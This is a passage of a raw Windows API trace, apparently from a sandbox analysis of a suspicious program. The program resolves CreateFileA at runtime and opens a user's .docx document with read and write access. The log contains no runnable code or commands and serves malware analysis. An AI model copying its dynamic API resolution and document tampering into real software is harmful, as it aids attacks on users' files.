dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.424] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd510 [0180.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd510, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.425] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0180.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0180.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd510, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0180.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.426] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0180.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0180.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0180.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0180.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x33) returned 0x90ad98 [0180.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", cchWideChar=51, lpMultiByteStr=0x90ad98, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx", lpUsedDefaultChar=0x0) returned 51 [0180.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.427] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zzwma.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x66) returned 0x8e8320 [0180.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=51, lpWideCharStr=0x8e8320, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.docx") returned 51 [0180.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0180.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0180.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0180.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0180.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0180.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0180.432] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.434] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0180.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.435] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0180.435] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.435] 